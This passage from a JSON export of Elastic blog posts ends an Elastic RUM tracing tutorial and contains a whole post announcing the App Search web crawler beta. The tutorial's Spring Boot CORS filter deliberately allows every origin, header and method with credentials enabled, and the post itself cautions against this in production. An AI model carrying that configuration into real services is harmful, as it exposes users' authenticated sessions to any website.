policy, your frontend requests from a different origin to the backend will fail without properly configured CORS. Basically, CORS is a way for the server side to check if requests coming in from a different origin are allowed. To read more about cross-origin requests and why this process is necessary, please see the MDN page on \u003ca href=\"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS\" target=\"_self\"\u003eCross-Origin Resource Sharing\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eWhat does that mean for us? It means two things:\u003c/p\u003e\n\u003col\u003e\n \u003cli\u003eWe must set the distributedTracingOrigins configuration option, as we have done.\u003c/li\u003e\n \u003cli\u003eWith that configuration, \u003ca href=\"https://www.elastic.co/guide/en/apm/agent/rum-js/current/distributed-tracing-guide.html#server-configuration\" target=\"_self\"\u003ethe RUM agent also sends an HTTP OPTIONS request before the real HTTP request to make sure all the headers and HTTP methods are supported and the origin is allowed\u003c/a\u003e. Specifically, http://localhost:8080 will receive an \u003cstrong\u003eOPTIONS\u003c/strong\u003e request with the following headers:\u003cbr /\u003e\u003cpre class=\"prettyprint\"\u003eAccess-Control-Request-Headers: traceparent, tracestate\u003cbr /\u003eAccess-Control-Request-Method: [request-method]\u003cbr /\u003eOrigin: [request-origin]\u003cbr /\u003e\u003c/pre\u003eAnd APM server should respond to it with these headers and a 200 status code:\u003cbr /\u003e\u003cpre class=\"prettyprint\"\u003eAccess-Control-Allow-Headers: traceparent, tracestate\u003cbr /\u003eAccess-Control-Allow-Methods: [allowed-methods]\u003cbr /\u003eAccess-Control-Allow-Origin: [request-origin]\u003cbr /\u003e\u003c/pre\u003e\n \u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eThe MyCorsConfiguration class in our Spring Boot application does exactly that. There are different ways of configuring Spring Boot to do this, but here we are using a filter based approach. It’s configuring our server-side Spring Boot application to allow requests from any origin with any HTTP headers and any HTTP methods. You may not want to be this open with your production applications.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e@Configuration\u003cbr /\u003epublic class MyCorsConfiguration {\u003cbr /\u003e @Bean\u003cbr /\u003e public FilterRegistrationBean\u0026lt;CorsFilter\u0026gt; corsFilter() {\u003cbr /\u003e UrlBasedCorsConfigurationSource source = new UrlBasedCorsConfigurationSource();\u003cbr /\u003e CorsConfiguration config = new CorsConfiguration();\u003cbr /\u003e config.setAllowCredentials(true);\u003cbr /\u003e config.addAllowedOrigin(\"*\");\u003cbr /\u003e config.addAllowedHeader(\"*\");\u003cbr /\u003e config.addAllowedMethod(\"*\");\u003cbr /\u003e source.registerCorsConfiguration(\"/**\", config);\u003cbr /\u003e FilterRegistrationBean\u0026lt;CorsFilter\u0026gt; bean = new FilterRegistrationBean\u0026lt;CorsFilter\u0026gt;(new CorsFilter(source));\u003cbr /\u003e bean.setOrder(0);\u003cbr /\u003e return bean;\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\n\u003ch2\u003eSummary\u003c/h2\u003e\n\u003cp\u003eHopefully, this blog made it clear that instrumenting your applications with Elastic RUM is simple and easy, yet extremely powerful. Together with other APM agents for backend services, RUM gives you a holistic view of application performance from an end-user perspective through distributed tracing.\u003c/p\u003e\n\u003cp\u003eOnce again, to get started with Elastic APM, you can download \u003ca href=\"https://www.elastic.co/downloads/apm\" target=\"_self\"\u003eElastic APM server\u003c/a\u003e to run it locally, or create an \u003ca href=\"https://cloud.elastic.co\" target=\"_self\"\u003eElastic Cloud\u003c/a\u003e trial account and have a cluster ready in a few minutes.\u003c/p\u003e\n\u003cp\u003eAs always, reach out on the \u003ca href=\"https://discuss.elastic.co/c/apm\" target=\"_self\"\u003eElastic APM forum\u003c/a\u003e if you want to open up a discussion or have any questions. Happy RUMing!\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eThis post was originally published on April 1, 2019. It was updated on October 20, 2022.\u003c/em\u003e\u003c/p\u003e","category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-18T14:04:16.043Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":{"title":"elastic-apm-distributed-tracing-large.jpg","uid":"bltaaf9d94ea011ca66","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-03-25T13:22:53.470Z","updated_at":"2019-03-25T13:22:53.470Z","content_type":"image/jpeg","file_size":"161628","filename":"elastic-apm-distributed-tracing-large.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-18T14:04:23.929Z","user":"sys_blt57a423112de8a853"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltaaf9d94ea011ca66/5c98d62d55e02a1e5a5e9b0c/elastic-apm-distributed-tracing-large.jpg"},"markdown_l10n":"","product":["apm"],"publish_date":"2022-10-20T16:00:00.000Z","seo":{"seo_title_l10n":"Performing Real User Monitoring (RUM) with Elastic APM","seo_description_l10n":"Elastic APM real user monitoring (RUM) captures user interactions with browsers. We will instrument an application with a React frontend and a Spring Boot backend using the RUM and Java agents. Together, they provide a holistic view of application performance from an end user perspective through distributed tracing.","og_markup":{"facebook_profile_id":""},"canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"title":"Real user monitoring","label_l10n":"Real user monitoring","keyword":"real-user-monitoring","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt59d92f2f17daff45","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:49:57.287Z","updated_at":"2023-11-06T20:49:57.287Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:27.810Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"title":"elastic-apm-distributed-tracing-small.png","uid":"blt1463e5e2ef1cadd0","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-03-25T13:21:49.326Z","updated_at":"2019-03-25T13:21:49.326Z","content_type":"image/png","file_size":"139110","filename":"elastic-apm-distributed-tracing-small.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-18T14:04:23.929Z","user":"sys_blt57a423112de8a853"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1463e5e2ef1cadd0/5c98d5ed12edfac256db3cd9/elastic-apm-distributed-tracing-small.png"},"title":"A Sip of Elastic RUM (Real User Monitoring)","title_l10n":"A Sip of Elastic RUM (Real User Monitoring)","updated_at":"2024-09-12T22:50:45.826Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/performing-real-user-monitoring-rum-with-elastic-apm","versions":[],"publish_details":{"time":"2024-09-12T22:54:22.425Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltbc89363d6c6d8e29","_version":29,"locale":"en-us","ACL":{},"abstract_l10n":"Announcing the beta launch of the Elastic App Search web crawler, a simple yet powerful way to ingest publicly available web content so it becomes instantly searchable on your website.","author":["bltf28e72cda4bd0d44"],"body_l10n":"\u003cp\u003eIn Elastic Enterprise Search 7.11, we’re thrilled to announce the beta launch of Elastic App Search web crawler, a simple yet powerful way to ingest publicly available web content so it becomes instantly searchable on your website.\u003c/p\u003e\n\u003cp\u003eMaking content on websites searchable can take several forms. \u003ca href=\"https://www.elastic.co/app-search/\" target=\"_self\"\u003eElastic App Search\u003c/a\u003e already lets users ingest content via JSON uploading, JSON pasting, and through API endpoints. In this release, the introduction of the beta web crawler gives users another convenient content ingestion method.\u003c/p\u003e\n\u003cdiv class=\"video embed-container shadow m-b-40\" style=\"height: 319.725px;\"\u003e\u003cimg class=\"vidyard-player-embed\" src=\"https://play.vidyard.com/fAt7DBU5BEVoycw7Zd5Uew.jpg\" data-uuid=\"fAt7DBU5BEVoycw7Zd5Uew\" data-v=\"4\" data-type=\"inline\" data-autoplay=\"1\" data-loop=\"1\" data-disable_analytics=\"1\" data-hidden_controls=\"1\" data-muted=\"1\" disable_analytics=\"1\" width=\"569\" /\u003e\u003c/div\u003e\n\u003cp\u003eAvailable for both self-managed and Elastic Cloud deployments, the web crawler retrieves information from publicly accessible web sites and makes the content searchable in your App Search engines. App Search does a lot of heavy lifting in the background on your behalf to make that searchable content relevant and easy to tune with sliders — not code.\u0026nbsp;\u003c/p\u003e\n\u003cp\u003eNow let’s dive into \u003cem\u003ewhy\u003c/em\u003e we are introducing the web crawler into App Search.\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003eWhat makes this web crawler different?\u0026nbsp;\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003eShort answer: Behold, Elastic Cloud.\u0026nbsp;\u003c/p\u003e\n\u003cp\u003eIf you’ve followed Elastic Enterprise Search over the years (we love our fan club), you’ll remember the web crawler was (and still is) available in \u003ca href=\"https://www.elastic.co/site-search/\" target=\"_self\"\u003eElastic Site Search\u003c/a\u003e. However, only Elastic App Search and Workplace Search are available on the hugely popular \u003ca href=\"https://www.elastic.co/cloud/\" target=\"_self\"\u003eElastic Cloud\u003c/a\u003e.\u0026nbsp;\u003c/p\u003e\n\u003cp\u003eYou may be asking, “Yeah, so?”\u0026nbsp;\u003c/p\u003e\n\u003cp\u003eWell, moving the completely redesigned and re-architected web crawler to App Search on Elastic Cloud has several compelling advantages:\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003e\u003cstrong\u003ePeace of mind with perks:\u003c/strong\u003e As the managed service for Elasticsearch and Kibana, Elastic Cloud provides the superior speed, scale, and relevance that defines Elastic. One-click upgrades, simple scaling, and index lifecycle management (ILM) are just a few reasons customers flock to Elastic Cloud. And if you’re already an Elastic Observability or Elastic Security customer, you can manage your entire deployment in one powerful console.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n \u003cli\u003e\u003cstrong\u003eYour data, your choice\u003c/strong\u003e: Elastic Cloud is available in \u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-regions-templates-instances.html\" target=\"_self\"\u003emore than 40 global regions\u003c/a\u003e on the world’s top cloud providers: Google Cloud (GCP), Microsoft Azure, and Amazon Web Services (AWS). Your data, your cloud, your way.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n \u003cli\u003e\u003cstrong\u003ePricing:\u003c/strong\u003e With Elastic’s novel resource-based pricing, you don’t have to worry about arcane metrics like number of users, number of queries, document size, or agents deployed. Your cost comes down to the hardware resources used to store, search, and analyze your data, no matter the use case.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eWhile we’re focusing on cloud deployments in this blog, it’s important to note that the App Search web crawler will now also be available as a self-managed deployment method — an option not available with \u003ca href=\"https://www.elastic.co/site-search/\" target=\"_self\"\u003eElastic Site Search\u003c/a\u003e (or \u003ca href=\"https://swiftype.com/\" target=\"_self\"\u003eSwiftype\u003c/a\u003e).\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003eWhat exactly does the web crawler, well, crawl?\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003eBefore we dive into how to set up the web crawler, let’s first review the what — as in what does the web crawler crawl on the public websites you specify.\u003c/p\u003e\n\u003cp\u003eThe web crawler will visit a webpage when you provide a URL, like http://www.elastic.co. From there, the web crawler will follow \u003cem\u003eeach new link\u003c/em\u003e it finds on that page and extract content for ingestion into your App Search engine. This is content discovery. Each discovered link is crawled in a similar way. The “tree” illustration shows how this works at a high level.\u003c/p\u003e\n\u003cp\u003e\u003cimg class=\"shadow\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd079d0afd366c587/6014796627b1080f84371f97/app-search-web-crawler-visual.png\" data-sys-asset-uid=\"bltd079d0afd366c587\" alt=\"App Search web crawler - crawling through a tree of linked pages\" /\u003e\u003c/p\u003e\n\u003cp\u003eIn the image above, all of the blue pages were crawled and indexed. However, none of the pages linked to the pink page, so it \u003cem\u003ewill not\u003c/em\u003e be crawled or indexed. For the web crawler to visit a page that is not interlinked, the page must be provided directly as an entry point or be included within a sitemap. We’ll cover how to set up entry points later in this blog.\u003c/p\u003e\n\u003ch3\u003e\u003cstrong\u003eTypes of content extracted\u003c/strong\u003e\u003c/h3\u003e\n\u003cp\u003eFor the beta release of the web crawler, the following content can be extracted from the HTML pages:\u003c/p\u003e\n\u003cul\u003e\n \u003cli aria-level=\"1\"\u003ePage title\u003c/li\u003e\n \u003cli aria-level=\"1\"\u003eDescription (meta)\u003c/li\u003e\n \u003cli aria-level=\"1\"\u003eKeywords (meta)\u003c/li\u003e\n \u003cli aria-level=\"1\"\u003eBody (normalized, with html tags stripped out)\u003c/li\u003e\n \u003cli aria-level=\"1\"\u003eCanonical URL\u003c/li\u003e\n \u003cli aria-level=\"1\"\u003eAdditional URLs (for the same document)\u003c/li\u003e\n \u003cli aria-level=\"1\"\u003eLinks\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003eHands-on: Getting started with the web crawler\u003c/strong\u003e\u003c/h2\u003e\n\u003cdiv class=\"video embed-container shadow m-b-40\" style=\"height: 319.725px;\"\u003e\u003cimg class=\"vidyard-player-embed shadow m-b-40\" src=\"https://play.vidyard.com/QrcimKbjdV1hW4ogWqZNso.jpg\" data-uuid=\"QrcimKbjdV1hW4ogWqZNso\" data-v=\"4\" data-type=\"inline\" data-autoplay=\"1\" data-loop=\"1\" data-hidden_controls=\"1\" data-muted=\"0\" muted=\"0\" width=\"569\" /\u003e\u003c/div\u003e\n\u003cp\u003eLet’s start at the beginning and create a new Elastic Enterprise Search deployment on the Elastic Cloud. For existing Elastic \u003ca href=\"https://www.elastic.co/site-search/\" target=\"_self\"\u003eSite Search\u003c/a\u003e customers, \u003ca href=\"https://swiftype.com/\" target=\"_self\"\u003eSwiftype customers\u003c/a\u003e, or those new to Elastic Cloud, be sure to sign up for a \u003ca href=\"https://cloud.elastic.co/registration?elektra=blog-introducing-app-search-crawler\" target=\"_self\"\u003efree 14-day trial\u003c/a\u003e to experience the beauty of the web crawler.\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eOn \u003ca href=\"https://www.elastic.co\" target=\"_self\"\u003ewww.elastic.co\u003c/a\u003e, select “Log in” from the top-right corner.\u003c/li\u003e\n \u003cli\u003eSeveral SSO methods are available. Or create a new account.\u003c/li\u003e\n \u003cli\u003eOnce logged in, select “Create deployment”.\u003c/li\u003e\n \u003cli\u003eChoose the Elastic Enterprise Search deployment template. This template is optimized for CPU output, storage, and availability zones. All deployment templates can be tailored to your specific needs after creating a deployment.\u003c/li\u003e\n \u003cli\u003eSelect your cloud provider from the list. The choice is yours: Google Cloud (GCP), Microsoft Azure, or Amazon Web Services (AWS)\u003c/li\u003e\n \u003cli\u003eName your deployment and then click “Create Deployment”.\u003c/li\u003e\n \u003cli\u003eYou’ll see a notification screen showing your deployment has been created.\u0026nbsp;\u003c/li\u003e\n\u003c/ul\u003e\n\u003cdiv class=\"video embed-container shadow m-b-40\" style=\"height: 319.725px;\"\u003e\u003cimg class=\"vidyard-player-embed\" src=\"https://play.vidyard.com/icLyWEvS9Exoj3L6979Bs5.jpg\" data-uuid=\"icLyWEvS9Exoj3L6979Bs5\" data-v=\"4\" data-type=\"inline\" data-autoplay=\"1\" data-loop=\"1\" data-hidden_controls=\"1\" data-muted=\"0\" muted=\"0\" width=\"569\" /\u003e\u003c/div\u003e\n\u003cp\u003eCongrats! You’re on your way to creating your first App Search engine.\u003c/p\u003e\n\u003cp\u003eThe Elastic Enterprise Search solution includes two applications: App Search and \u003ca href=\"https://www.elastic.co/workplace-search\" target=\"_self\"\u003eWorkplace Search\u003c/a\u003e. For this tutorial, select the “Launch App Search” button.\u003c/p\u003e\n\u003cp\u003e\u003cimg class=\"shadow\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt56aa9339ce722187/6014773d0069f70f777217d1/enterprise-search-overview.jpg\" data-sys-asset-uid=\"blt56aa9339ce722187\" alt=\"Welcome screen for Elastic Enterprise Search new deployment\" /\u003e\u003c/p\u003e\n\u003cp\u003eWell done! You’re now in App Search and ready to roll with creating a web crawler.\u003c/p\u003e\n\u003cp\u003eThe onboarding flow helps you create your first search engine. Simply name your engine (something like “my-elastic-search-engine” will work) and then you’ll see a screen offering four ways to ingest your data: paste JSON, upload a JSON file, index by API, or use the web crawler. By now, you know which one to choose.\u003c/p\u003e\n\u003cp\u003eAt this point, you can choose to add your own website, or for fun select Elastic.co as the domain URL to crawl. Remember, the web crawler will visit the specified webpage when you provide the URL extracting content along the way. From there it will follow each new link on discovered pages until the web crawler hits a dead end.\u003c/p\u003e\n\u003cdiv class=\"video embed-container shadow m-b-40\" style=\"height: 319.725px;\"\u003e\u003cimg class=\"vidyard-player-embed\" src=\"https://play.vidyard.com/PG5SqAVwVCrnXp8EYnGbdR.jpg\" data-uuid=\"PG5SqAVwVCrnXp8EYnGbdR\" data-v=\"4\" data-type=\"inline\" data-autoplay=\"1\" data-loop=\"1\" data-hidden_controls=\"1\" data-muted=\"0\" muted=\"0\" width=\"569\" /\u003e\u003c/div\u003e\n\u003cp\u003eThis is where the Entry Points feature comes in handy. If there’s an “island” page that isn’t linked from other pages, simply add that full URL as an entry point. From there, the web crawler will start indexing that content and continue finding new links for content extraction until it can go no farther.\u003c/p\u003e\n\u003cp\u003eFrom the same console page, you can create crawl rules. These rules allow admins to include or exclude pages where the URL matches the rule. For example, perhaps your marketing department uses campaign landing pages — indicated by the path pattern /lp. These landing pages are fine for driving new business with targeted content but maybe not not the type of content you want included in your search engine.\u0026nbsp;\u003c/p\u003e\n\u003cp\u003eIn the crawl rules section, add a new policy that disallows indexing content with any URL path that contains /lp.\u0026nbsp;\u0026nbsp;\u003c/p\u003e\n\u003cp\u003eThe suspense! Now it’s time to crawl. When all of your entry points and crawl rules are completed, select the \u003cstrong\u003eStart a Crawl\u003c/strong\u003e button.\u0026nbsp;\u003c/p\u003e\n\u003cdiv class=\"video embed-container shadow m-b-40\" style=\"height: 319.725px;\"\u003e\u003cimg class=\"vidyard-player-embed\" src=\"https://play.vidyard.com/SfGPHLPLVed2aUpBiurqiy.jpg\" data-uuid=\"SfGPHLPLVed2aUpBiurqiy\" data-v=\"4\" data-type=\"inline\" data-autoplay=\"1\" data-loop=\"1\" data-hidden_controls=\"1\" data-muted=\"0\" muted=\"0\" width=\"569\" /\u003e\u003c/div\u003e\n\u003cp\u003eClick over to the Documents tab and watch as your content is ingested into the App Search engine. Or click the Query Tester icon at the top-right of the screen to search your engine from anywhere in the App Search UI.\u003c/p\u003e\n\u003cp\u003eIf you want to immediately test your results in a search box, select the Reference UI tab. From here you can use the out-of-the-box, React-based search box. Or better yet, build and customize your own search experience using the Elastic \u003ca href=\"https://www.elastic.co/enterprise-search/search-ui\" target=\"_self\"\u003eSearch UI\u003c/a\u003e JavaScript libraries.\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003eNow it’s your turn\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003eWe think you’ll enjoy the powerful yet simple design of the web crawler. So now it’s your turn to try it out!\u003c/p\u003e\n\u003cp\u003eThe Elastic App Search web crawler is currently in beta and available on all \u003ca href=\"https://www.elastic.co/pricing/\" target=\"_self\"\u003esubscription levels\u003c/a\u003e and available on self-managed and Elastic Cloud deployments. Existing Elastic Cloud customers can access Enterprise Search directly from the \u003ca href=\"https://cloud.elastic.co/\" target=\"_self\"\u003eElastic Cloud console\u003c/a\u003e.\u0026nbsp;\u003c/p\u003e\n\u003cp\u003eNew to the Elastic Cloud? Take a look at our \u003ca href=\"https://www.elastic.co/training/free#quick-starts\" target=\"_self\"\u003eQuick Start guides\u003c/a\u003e — bite-sized training videos to get you started quickly — and then start a \u003ca href=\"https://cloud.elastic.co/registration?elektra=blog-introducing-app-search-crawler\" target=\"_self\"\u003efree 14-day trial of Elastic Enterprise Search\u003c/a\u003e. Or \u003ca href=\"https://www.elastic.co/downloads/enterprise-search\" target=\"_self\"\u003edownload\u003c/a\u003e the self-managed versions of App Search or Workplace Search for free.\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003eResources:\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003eBlog: \u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-enterprise-search-7-11-0-web-crawler-box-content-source\" target=\"_self\"\u003eWhat’s New in Elastic Enterprise Search: Web crawler and Box as a content source\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eDocs: \u003ca href=\"https://www.elastic.co/guide/en/app-search/7.11/web-crawler.html\" target=\"_self\"\u003eApp Search web crawler\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eGetting Started: \u003ca href=\"https://www.elastic.co/enterprise-search\" target=\"_self\"\u003eElastic Cloud: Start a free 14-day trial\u003c/a\u003e\u003c/p\u003e","category":[{"uid":"bltb79594af7c5b4199","_version":3,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:05.640Z","created_by":"blt3044324473ef223b70bc674c","key":"product","label_l10n":"Product","tags":[],"title":"Product","updated_at":"2024-05-10T13:44:20.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.527Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2021-01-28T19:23:53.391Z","created_by":"bltea6cbb86fea188be","disclaimer":[],"full_bleed_image":{"_version":1,"is_dir":false,"uid":"blt7acf52a8bf80b500","ACL":{},"content_type":"image/png","created_at":"2021-01-30T20:17:18.180Z","created_by":"bltea6cbb86fea188be","file_size":"78122","filename":"blog-banner-app-search-web-crawler.png","parent_uid":null,"tags":[],"title":"blog-banner-app-search-web-crawler.png","updated_at":"2021-01-30T20:17:18.180Z","updated_by":"bltea6cbb86fea188be","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-02-10T18:45:56.454Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7acf52a8bf80b500/6015bece6215cf0f9a18f2ff/blog-banner-app-search-web-crawler.png"},"markdown_l10n":"","product":[],"publish_date":"2021-02-10T17:08:00.000Z","seo":{"seo_title_l10n":"","seo_description_l10n":"We’re thrilled to announce the beta launch of Elastic App Search web crawler, a simple yet powerful way to ingest publicly available web content so it becomes instantly searchable on your website.","canonical_tag":"","og_markup":{"facebook_profile_id":""},"noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt240c2986db0ba465","ACL":{},"created_at":"2023-11-06T21:31:10.051Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"search-applications","label_l10n":"Search applications","tags":[],"title":"Search applications","updated_at":"2023-11-06T21:31:10.051Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.331Z","user":"blt4b2e1169881270a8"}},{"title":"Search UI","label_l10n":"Search UI","keyword":"search-ui","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltaea23ea6eafbd6eb","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:31:21.217Z","updated_at":"2023-11-06T21:31:21.217Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:49.855Z","user":"blt4b2e1169881270a8"}},{"title":"Search analytics","label_l10n":"Search analytics","keyword":"search-analytics","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt6c991eb897ec7277","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:30:57.427Z","updated_at":"2023-11-06T21:30:57.427Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T12:28:49.147Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt3d6d3cd2ad3fce72","ACL":{},"created_at":"2023-11-06T21:35:37.967Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"visualization","label_l10n":"Visualization","tags":[],"title":"Visualization","updated_at":"2023-11-06T21:35:37.967Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.605Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltf4c040a3cb414ac0","ACL":{},"created_at":"2023-11-06T21:32:35.092Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"semantic-search","label_l10n":"Semantic search","tags":[],"title":"Semantic search","updated_at":"2023-11-06T21:32:35.092Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.425Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltefbcf6957c5e689a","ACL":{},"created_at":"2023-11-06T20:35:45.445Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-search","label_l10n":"Cloud search","tags":[],"title":"Cloud search","updated_at":"2023-11-06T20:35:45.445Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:40:50.742Z","user":"blt06083bb707628f5c"}},{"_version":1,"locale":"en-us","uid":"blt9fb9f67ee7bb5c15","ACL":{},"created_at":"2023-11-06T20:50:46.256Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"real-time-analysis","label_l10n":"Real-time analysis","tags":[],"title":"Real-time analysis","updated_at":"2023-11-06T20:50:46.256Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:37:43.334Z","user":"blt06083bb707628f5c"}},{"_version":1,"locale":"en-us","uid":"blt0e7c39f65cbd3755","ACL":{},"created_at":"2023-11-06T20:37:20.943Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-ingestion","label_l10n":"Data ingestion","tags":[],"title":"Data 